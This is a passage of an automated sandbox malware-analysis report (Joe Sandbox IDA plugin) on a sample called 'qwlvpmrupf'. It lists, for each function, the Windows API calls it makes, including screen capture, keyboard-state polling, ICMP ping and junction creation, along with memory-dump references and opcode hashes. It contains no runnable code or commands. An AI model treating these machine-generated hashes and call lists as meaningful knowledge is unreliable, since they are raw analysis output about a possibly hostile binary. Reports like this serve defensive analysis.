                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                • String ID:
                                                • API String ID: 3840717409-0
                                                • Opcode ID: 708fa8f83735ab74a9e769b25ea73fa7c7745344ab0ea5a85bcb3222b9f1ca03
                                                • Instruction ID: 3aaba56fb73829ec86cbf2c097114e4c0823e45aba79766e582f6c41b7a6b919
                                                • Opcode Fuzzy Hash: 708fa8f83735ab74a9e769b25ea73fa7c7745344ab0ea5a85bcb3222b9f1ca03
                                                • Instruction Fuzzy Hash: 48414C71A00205AFDB11DFA5CE48EAB7BB9EF89710F104069F905E7290DB749D45CB24
                                                APIs
                                                • GetDC.USER32(00000000), ref: 003F2F35
                                                • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 003F2F45
                                                • CreateCompatibleDC.GDI32(?), ref: 003F2F51
                                                • SelectObject.GDI32(00000000,?), ref: 003F2F5E
                                                • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 003F2FCA
                                                • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 003F3009
                                                • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 003F302D
                                                • SelectObject.GDI32(?,?), ref: 003F3035
                                                • DeleteObject.GDI32(?), ref: 003F303E
                                                • DeleteDC.GDI32(?), ref: 003F3045
                                                • ReleaseDC.USER32(00000000,?), ref: 003F3050
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                • String ID: (
                                                • API String ID: 2598888154-3887548279
                                                • Opcode ID: 3cb405aa39df044d899f48497b8ec878c5f8d3b61b3cb6e8d0202b3def9be3ec
                                                • Instruction ID: ca092b2697dbd682ebe741dbbc284d2f9c3ff743ea6cf61d5f15cab8df5e7dd3
                                                • Opcode Fuzzy Hash: 3cb405aa39df044d899f48497b8ec878c5f8d3b61b3cb6e8d0202b3def9be3ec
                                                • Instruction Fuzzy Hash: C461F3B5D00219EFCF05CFE4D984AAEBBB5FF48310F208529E659AB250D771A941CF94
                                                APIs
                                                • GetMenuItemInfoW.USER32(00442990,000000FF,00000000,00000030), ref: 003DC888
                                                • SetMenuItemInfoW.USER32(00442990,00000004,00000000,00000030), ref: 003DC8BD
                                                • Sleep.KERNEL32(000001F4), ref: 003DC8CF
                                                • GetMenuItemCount.USER32(?), ref: 003DC915
                                                • GetMenuItemID.USER32(?,00000000), ref: 003DC932
                                                • GetMenuItemID.USER32(?,-00000001), ref: 003DC95E
                                                • GetMenuItemID.USER32(?,?), ref: 003DC9A5
                                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 003DC9EB
                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003DCA00
                                                • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003DCA21
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                • String ID: 0
                                                • API String ID: 1460738036-4108050209
                                                • Opcode ID: f64c2ee771747f25a1406d5ce353a235909edd85ad9d9e305b445458fa0c3588
                                                • Instruction ID: 676cb7a72af22b129a2a0616594815b7e3dbef84d31c8a9efd668cb07d955e71
                                                • Opcode Fuzzy Hash: f64c2ee771747f25a1406d5ce353a235909edd85ad9d9e305b445458fa0c3588
                                                • Instruction Fuzzy Hash: 8761617293025BABDF12CFA4ED98AEEBBB8FB05304F111166F841A7251D7349D45CB60
                                                APIs
                                                • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 003E469A
                                                • _wcslen.LIBCMT ref: 003E46C7
                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 003E46F7
                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 003E4718
                                                • RemoveDirectoryW.KERNEL32(?), ref: 003E4728
                                                • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 003E47AF
                                                • CloseHandle.KERNEL32(00000000), ref: 003E47BA
                                                • CloseHandle.KERNEL32(00000000), ref: 003E47C5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                • String ID: :$\$\??\%s
                                                • API String ID: 1149970189-3457252023
                                                • Opcode ID: da8cdd46471de6a7f54aec006692352297399c23d188bb7b6a114d7068f4d782
                                                • Instruction ID: 00b15dfdd0b52f2d3099a76f392bbb670dae07a37fd899612b65ea2632a5183c
                                                • Opcode Fuzzy Hash: da8cdd46471de6a7f54aec006692352297399c23d188bb7b6a114d7068f4d782
                                                • Instruction Fuzzy Hash: 0B31E4B1900259ABDB229FA1DC45FEB37BCEF89740F1041B9F615E60A0EB7096448B64
                                                APIs
                                                • timeGetTime.WINMM ref: 003DEEE0
                                                  • Part of subcall function 0038F27E: timeGetTime.WINMM(?,?,003DEF00), ref: 0038F282
                                                • Sleep.KERNEL32(0000000A), ref: 003DEF0D
                                                • EnumThreadWindows.USER32(?,Function_0006EE91,00000000), ref: 003DEF31
                                                • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 003DEF53
                                                • SetActiveWindow.USER32 ref: 003DEF72
                                                • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 003DEF80
                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 003DEF9F
                                                • Sleep.KERNEL32(000000FA), ref: 003DEFAA
                                                • IsWindow.USER32 ref: 003DEFB6
                                                • EndDialog.USER32(00000000), ref: 003DEFC7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                • String ID: BUTTON
                                                • API String ID: 1194449130-3405671355
                                                • Opcode ID: 3aa43200e46e631d32d840a39482dc5de58ded08c987f2b061c19ae4c29cf460
                                                • Instruction ID: 673b9f4e693e687866e70f81943239fa529d4f5a492b2044a7b5cf4f44a5f9d8
                                                • Opcode Fuzzy Hash: 3aa43200e46e631d32d840a39482dc5de58ded08c987f2b061c19ae4c29cf460
                                                • Instruction Fuzzy Hash: D921A479100215BFEB127FA0FD88A2A3F6EF746746F120436F4019A3A1CB728D048A6C
                                                APIs
                                                • GetKeyboardState.USER32(?), ref: 003DA8EE
                                                • SetKeyboardState.USER32(?), ref: 003DA959
                                                • GetAsyncKeyState.USER32(000000A0), ref: 003DA979
                                                • GetKeyState.USER32(000000A0), ref: 003DA990
                                                • GetAsyncKeyState.USER32(000000A1), ref: 003DA9BF
                                                • GetKeyState.USER32(000000A1), ref: 003DA9D0
                                                • GetAsyncKeyState.USER32(00000011), ref: 003DA9FC
                                                • GetKeyState.USER32(00000011), ref: 003DAA0A
                                                • GetAsyncKeyState.USER32(00000012), ref: 003DAA33
                                                • GetKeyState.USER32(00000012), ref: 003DAA41
                                                • GetAsyncKeyState.USER32(0000005B), ref: 003DAA6A
                                                • GetKeyState.USER32(0000005B), ref: 003DAA78
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: State$Async$Keyboard
                                                • String ID:
                                                • API String ID: 541375521-0
                                                • Opcode ID: 7bddc160a4a751adbc2c45b7fb365951c65579353a4365c2c84a12f34fc72609
                                                • Instruction ID: 2f3e043c823877cdd02e63ea49f21ce3b2da8082686ec6204dfe5114533acd67
                                                • Opcode Fuzzy Hash: 7bddc160a4a751adbc2c45b7fb365951c65579353a4365c2c84a12f34fc72609
                                                • Instruction Fuzzy Hash: 0E51EA22904B8869EB37D7B05A107AABFF49F11340F4A459BD9C21B3C2DB649A4CC763
                                                APIs
                                                • GetDlgItem.USER32(?,00000001), ref: 003D6571
                                                • GetWindowRect.USER32(00000000,?), ref: 003D658A
                                                • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 003D65E8
                                                • GetDlgItem.USER32(?,00000002), ref: 003D65F8
                                                • GetWindowRect.USER32(00000000,?), ref: 003D660A
                                                • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 003D665E
                                                • GetDlgItem.USER32(?,000003E9), ref: 003D666C
                                                • GetWindowRect.USER32(00000000,?), ref: 003D667E
                                                • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 003D66C0
                                                • GetDlgItem.USER32(?,000003EA), ref: 003D66D3
                                                • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 003D66E9
                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 003D66F6
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Window$ItemMoveRect$Invalidate
                                                • String ID:
                                                • API String ID: 3096461208-0
                                                • Opcode ID: 6df0b8335128d7bd87aa099550c641430674f52b91692e81063f5cdd18ad8836
                                                • Instruction ID: e858d5e50b7fbff6392053f2a63153ec7412f4184101f4af1c10d6ef2f9cba34
                                                • Opcode Fuzzy Hash: 6df0b8335128d7bd87aa099550c641430674f52b91692e81063f5cdd18ad8836
                                                • Instruction Fuzzy Hash: AF510EB1E00205AFDF09CFA8DE86AAEBBB9FB48300F118139F519E7294D7719D048B54
                                                APIs
                                                  • Part of subcall function 003721E4: GetWindowLongW.USER32(?,000000EB), ref: 003721F2
                                                • GetSysColor.USER32(0000000F), ref: 00372102
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: ColorLongWindow
                                                • String ID:
                                                • API String ID: 259745315-0
                                                • Opcode ID: 7cd9daa2940eeba486a02012844ccbdce9eeaab0ae61dc4d7f20e80e18037f77
                                                • Instruction ID: e0a95eeebf4cdf8255a82b98aaf7a11014520eeeff95b1cd6b39e11a9eb390d9
                                                • Opcode Fuzzy Hash: 7cd9daa2940eeba486a02012844ccbdce9eeaab0ae61dc4d7f20e80e18037f77
                                                • Instruction Fuzzy Hash: B541D531500650AFDB325F38DC84BBB3769BB46324F568615FBA69B2E1CB358D42DB10
                                                APIs
                                                • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0040499A
                                                • CreateCompatibleDC.GDI32(00000000), ref: 004049A1
                                                • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 004049B4
                                                • SelectObject.GDI32(00000000,00000000), ref: 004049BC
                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 004049C7
                                                • DeleteDC.GDI32(00000000), ref: 004049D1
                                                • GetWindowLongW.USER32(?,000000EC), ref: 004049DB
                                                • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 004049F1
                                                • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 004049FD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                • String ID: static
                                                • API String ID: 2559357485-2160076837
                                                • Opcode ID: a3806cde7d8e43b111b9e52c64daa16f3c0e1d6cfcfb3276374752c6f860e12b
                                                • Instruction ID: 0fab4b4d1bdf81c1905f343171d4d3abe157087b7a907553d752a5dbf8b08594
                                                • Opcode Fuzzy Hash: a3806cde7d8e43b111b9e52c64daa16f3c0e1d6cfcfb3276374752c6f860e12b
                                                • Instruction Fuzzy Hash: BD316B72500219ABDF119FA4CD08FDB3B68FF49324F100226FA58B61E0CB39D815DBA8
                                                APIs
                                                • VariantInit.OLEAUT32(?), ref: 003F45B9
                                                • CoInitialize.OLE32(00000000), ref: 003F45E7
                                                • CoUninitialize.OLE32 ref: 003F45F1
                                                • _wcslen.LIBCMT ref: 003F468A
                                                • GetRunningObjectTable.OLE32(00000000,?), ref: 003F470E
                                                • SetErrorMode.KERNEL32(00000001,00000029), ref: 003F4832
                                                • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 003F486B
                                                • CoGetObject.OLE32(?,00000000,00410B64,?), ref: 003F488A
                                                • SetErrorMode.KERNEL32(00000000), ref: 003F489D
                                                • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 003F4921
                                                • VariantClear.OLEAUT32(?), ref: 003F4935
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                • String ID:
                                                • API String ID: 429561992-0
                                                • Opcode ID: 4f8f5d58c82b8afe793ad4ac722c1c9c6382165b38a79322f25b651ce81fedc0
                                                • Instruction ID: 2403ed5401a7c5d0282b48a7f7e577e0a3164e751f068ef0f17ac102e5cd64cf
                                                • Opcode Fuzzy Hash: 4f8f5d58c82b8afe793ad4ac722c1c9c6382165b38a79322f25b651ce81fedc0
                                                • Instruction Fuzzy Hash: ADC146B16083059FD701EF68C88492BB7E9FF89748F10492DFA999B220DB71ED45CB52
                                                APIs
                                                • CoInitialize.OLE32(00000000), ref: 003E844D
                                                • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 003E84E9
                                                • SHGetDesktopFolder.SHELL32(?), ref: 003E84FD
                                                • CoCreateInstance.OLE32(00410CD4,00000000,00000001,00437E8C,?), ref: 003E8549
                                                • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 003E85CE
                                                • CoTaskMemFree.OLE32(?,?), ref: 003E8626
                                                • SHBrowseForFolderW.SHELL32(?), ref: 003E86B1
                                                • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 003E86D4
                                                • CoTaskMemFree.OLE32(00000000), ref: 003E86DB
                                                • CoTaskMemFree.OLE32(00000000), ref: 003E8730
                                                • CoUninitialize.OLE32 ref: 003E8736
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                • String ID:
                                                • API String ID: 2762341140-0
                                                • Opcode ID: 1cc744ad7f1a734d16cd83e8d91f0829a25ec200b89b5d9e34678bd54087875f
                                                • Instruction ID: fbaa67dc77a93ffdcf29786d8834c8421e43f02d0597ca6a5a2f09b99449a708
                                                • Opcode Fuzzy Hash: 1cc744ad7f1a734d16cd83e8d91f0829a25ec200b89b5d9e34678bd54087875f
                                                • Instruction Fuzzy Hash: 01C13A75A00159AFCB15DFA5C884DAEBBF9FF48304B1485A8E51AAB3A1CB30ED45CB50
                                                APIs
                                                • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 003D033F
                                                • SafeArrayAllocData.OLEAUT32(?), ref: 003D0398
                                                • VariantInit.OLEAUT32(?), ref: 003D03AA
                                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 003D03CA
                                                • VariantCopy.OLEAUT32(?,?), ref: 003D041D
                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 003D0431
                                                • VariantClear.OLEAUT32(?), ref: 003D0446
                                                • SafeArrayDestroyData.OLEAUT32(?), ref: 003D0453
                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 003D045C
                                                • VariantClear.OLEAUT32(?), ref: 003D046E
                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 003D0479
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                • String ID:
                                                • API String ID: 2706829360-0
                                                • Opcode ID: 212c096db27ea19fbff05f6b7208cda3f63706a805dbc8720ca2c87219ea5157
                                                • Instruction ID: c9f628cffe0a6ab8edc26d90ff98fa7c8ee732051ee1751da4f8b8195ebe0315
                                                • Opcode Fuzzy Hash: 212c096db27ea19fbff05f6b7208cda3f63706a805dbc8720ca2c87219ea5157
                                                • Instruction Fuzzy Hash: 9A417F35E00219DFCB05DFA5D848EAEBBB9FF48754F008069E955AB361CB30A945CFA0
                                                APIs
                                                  • Part of subcall function 00372441: GetWindowLongW.USER32(00000000,000000EB), ref: 00372452
                                                • GetSystemMetrics.USER32(0000000F), ref: 0040A926
                                                • GetSystemMetrics.USER32(0000000F), ref: 0040A946
                                                • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0040AB83
                                                • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0040ABA1
                                                • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0040ABC2
                                                • ShowWindow.USER32(00000003,00000000), ref: 0040ABE1
                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0040AC06
                                                • DefDlgProcW.USER32(?,00000005,?,?), ref: 0040AC29
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                • String ID:
                                                • API String ID: 1211466189-3916222277
                                                • Opcode ID: 76efd2f9fb46aa6d625e5d253c625c1c4a82d6e7f5703f4e686939bb31b78993
                                                • Instruction ID: 3b2fafd9b2111d8325ab98f28181a774a3332563560b3de6111578bc680530c1
                                                • Opcode Fuzzy Hash: 76efd2f9fb46aa6d625e5d253c625c1c4a82d6e7f5703f4e686939bb31b78993
                                                • Instruction Fuzzy Hash: A6B19C31600319DFDF14CF68CA85BAE7BB2BF84701F09807AED45AB295D738A960CB55
                                                APIs
                                                • WSAStartup.WSOCK32(00000101,?), ref: 003F0F19
                                                • inet_addr.WSOCK32(?), ref: 003F0F79
                                                • gethostbyname.WSOCK32(?), ref: 003F0F85
                                                • IcmpCreateFile.IPHLPAPI ref: 003F0F93
                                                • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 003F1023
                                                • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 003F1042
                                                • IcmpCloseHandle.IPHLPAPI(?), ref: 003F1116
                                                • WSACleanup.WSOCK32 ref: 003F111C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                • String ID: Ping
                                                • API String ID: 1028309954-2246546115
                                                • Opcode ID: 178bc7d0cdda32f354f3cd85263e23eb8c868655dfe226f36d0ce8ec0a099015
                                                • Instruction ID: 79fda3f818c93cc4c420f6db32641576c726ddfd773852ceb019805aaa946817
                                                • Opcode Fuzzy Hash: 178bc7d0cdda32f354f3cd85263e23eb8c868655dfe226f36d0ce8ec0a099015
                                                • Instruction Fuzzy Hash: BD91C031604242DFD721DF15D884F26BBE4EF44318F1585A9F6698F6A2CB35EC85CB81
                                                APIs
                                                • GetLocalTime.KERNEL32(?), ref: 003E8BB1
                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 003E8BC1
                                                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 003E8BCD
                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 003E8C6A
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 003E8C7E
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 003E8CB0
                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 003E8CE6
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 003E8CEF
                                                Strings
                                                Memory Dump Source
